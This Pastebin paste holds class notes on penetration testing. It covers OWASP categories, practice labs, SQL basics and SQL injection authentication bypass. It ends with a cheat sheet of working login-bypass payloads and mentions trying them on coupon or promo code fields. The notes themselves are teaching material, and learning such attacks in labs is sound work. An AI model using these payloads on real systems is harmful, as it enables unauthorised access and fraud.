Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Session 9
- =========
- Introduction to VAPT
- ====================
- V --> Vulnerability
- weekness, loopholes --> Access Points from where an attacker can compromise with your device| Web application
- A --> Assessment
- To assess ---> To scan for the Vulnerability
- P --> Penetration
- To penetrate --> To gain access of the device
- T --> Testing
- To test for vulnerabilities and to generate the report
- VA and PT
- ---------
- Vulnerability Assessment
- We scan for the loop holes and vulnerabilities, and make a report for the same
- Penetration Testing
- We try to gain access via above mentioned vulnerabilities.
- OWASP
- =====
- Open Web Application Security Project
- It is a non profit charitable organisation. which works for the security and the welfare of the web application.
- OWASP come up with an initiative ---> CTF Initiative
- CTF --> Capture The Flag
- OWASP TOP 10 Attacks
- Injection
- XSS --> Cross Site Scripting
- CSRF --> Cross Site Request Forgery
- IDOR --> Insecure Direct Object References
- Sensitive Data Exposure
- Invalidated Redirects and Forwards
- Mission Function Level Access Control
- Security Misconfiguration
- Using Components With Known Vulnerability
- Broken Authentication and Session Management
- https://www.owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf
- Simulated Environment ---> Which are by default vulnerable
- LVS --> Lucideus vulnerable Simulation
- DVWA --> Damn vulnerable Web Application --> 1.8
- WAVE
- BEEWasp
- WebGoat
- Setup and Configure LVS
- =======================
- https://ufile.io/o4dwz --> Downloading Link For LVS
- Step 1 --> To extract the zip file
- Step 2 --> Copy the extracted ZIP file in C:\xampp\htdocs
- Step 3 --> Start the xampp server
- Step 4 --> Start apache and mysql services
- Step 5 --> start the browser and type --> 127.0.0.1/<lvs Folder name>
- DBMS
- ====
- Database Management System
- Database --> Collection of data --> It stores data in a tabular manner. In the form of rows and columns.
- tuples and attributes
- Database --> Tables --> Columns --> Rows(data)
- DBA --> Data Base Administrator
- SQL --> Structured Query Language
- =================================
- https://www.xyz.com/items.php?id=2
- ---> Product name, Product Price
- Select product_name,Product_price from items where id=2;
- Source ---> Delhi
- Destination --> Jalandhar
- Date --> 20/6/2018
- Class --> 1T
- select train_name from trains where source="Delhi" and Destination="Jalandhar" and date="20/02/2018" and class="1T";
- Queries
- =======
- 1. Insert
- Insert into <table_name>(Column_Name) VALUES(Values to be inserted);
- INSERT INTO `info`(`Name`, `Salary`, `Address`, `Gen`) VALUES (Prashant, 10000, Roshan Garden Najafgarh, M);
- 2. Select
- Select * from <table_name>;
- Select * from info;
- 3. UPDATE
- Update <table_name> SET <value to change> where <condition>;
- UPDATE info SET Salary=30000 where Name="Abhijeet Singh";
- 4. Where
- It is a condition
- Select * from info where salary > 15000;
- Select * from info where name like "A%";
- 5. Delete
- DELETE from info WHERE Name="Abhijeet Singh";
- 6. AND
- SELECT * FROM `info` WHERE salary>=20000 and Gen='M';
- 7. Create
- Create table <table_name>(columns_name data_Type Length);
- CREATE table training(Name Text(20), Age int(3), Gender Text(1));
- 8. Order By
- It will arrange the data into either ascending order or in descending order
- SELECT * FROM `training` ORDER BY Name;
- 9. Group By
- To group the data
- SELECT * FROM `training` GROUP by Gender;
- 10. UNION
- SELECT name from info UNION select name from training;
- SELECT name,gen,salary,address from info UNION SELECT name,gender,age,null FROM training;
- 11. Information_schema -->Meta database
- SQL Injection
- =============
- Authentication Bypass
- ---------------------
- To bypass the authentication on any login form and gain teh access as the administrator.
- There are 4 types of authentication
- 1. Basic Authentication
- 2. Integrated Authentication
- 3. Digest Authentication
- 4. Form Based Authentication
- Logic Gates
- ===========
- AND Gate --> If any of the value is false, then the ans will be flase
- 0 and 0 = 0
- 0 and 1 = 0
- 1 and 0 = 0
- 1 and 1 = 1
- OR --> If any of the value is true, then the answer will be true
- 0 or 0 = 0
- 0 or 1 = 1
- 1 or 0 = 1
- 1 or 1 = 1
- 1 ---> True ---> Administrator
- ' ---> Single inverted Comma ---> Use to break the SQL query
- www.abc.com/items.php?id=2
- www.abc.com/items.php?id=2' 1'or'1'='1 '
- 1'or'1'='1
- admin and 1'or'1'='1
- select '1'or'1'='1'
- Username --> 1'or'1'='1 always true
- Password --> 1'or'1'='1 always true
- Administrator Login
- x'or'x'='x ---> true
- Cupons| Promo Code ---> 1'or'1'='1
- Cheat sheet
- ===========
- or 1=1
- or 1=1--
- or 1=1#
- or 1=1/*
- admin' --
- admin' #
- admin'/*
- admin' or '1'='1
- admin' or '1'='1'--
- admin' or '1'='1'#
- admin' or '1'='1'/*
- admin'or 1=1 or ''='
- admin' or 1=1
- admin' or 1=1--
- admin' or 1=1#
- admin' or 1=1/*
- admin') or ('1'='1
- admin') or ('1'='1'--
- admin') or ('1'='1'#
- admin') or ('1'='1'/*
- admin') or '1'='1
- admin') or '1'='1'--
- admin') or '1'='1'#
- admin') or '1'='1'/*
- 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
- admin" --
- admin" #
- admin"/*
- admin" or "1"="1
- admin" or "1"="1"--
- admin" or "1"="1"#
- admin" or "1"="1"/*
- admin"or 1=1 or ""="
- admin" or 1=1
- admin" or 1=1--
- admin" or 1=1#
- admin" or 1=1/*
- admin") or ("1"="1
- admin") or ("1"="1"--
- admin") or ("1"="1"#
- admin") or ("1"="1"/*
- admin") or "1"="1
- admin") or "1"="1"--
- admin") or "1"="1"#
- admin") or "1"="1"/*
- 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement